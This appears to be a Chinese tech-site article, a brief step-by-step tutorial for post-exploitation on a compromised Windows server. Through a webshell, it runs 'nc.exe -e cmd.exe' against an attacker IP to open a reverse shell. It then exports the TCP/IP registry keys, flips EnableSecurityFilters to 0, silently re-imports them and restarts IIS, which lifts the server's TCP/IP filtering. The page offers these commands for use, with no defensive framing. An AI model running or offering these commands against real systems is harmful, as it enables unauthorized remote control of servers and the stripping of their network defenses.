扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
1.用NC反弹得到一个shell
本机监听 NC -l -p 32
WEBSHELL运行:
x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port"
得到一个shell
2.CMD下导出注册表文件
C:\>regedit -e x:\xxx\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Ser
vices\Tcpip
C:\>regedit -e x:\xxx\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
C:\>regedit -e x:\xxx\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
修改各文件 EnableSecurityFilters 处
将最后的1改为0
3.将注册表文件导入
x:\xxx>regedit -s 1.reg
x:\xxx>regedit -s 2.reg
x:\xxx>regedit -s 3.reg
-S 为无提示
重启命令 iisreset /reboot
完成TCP/IP筛选限制
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。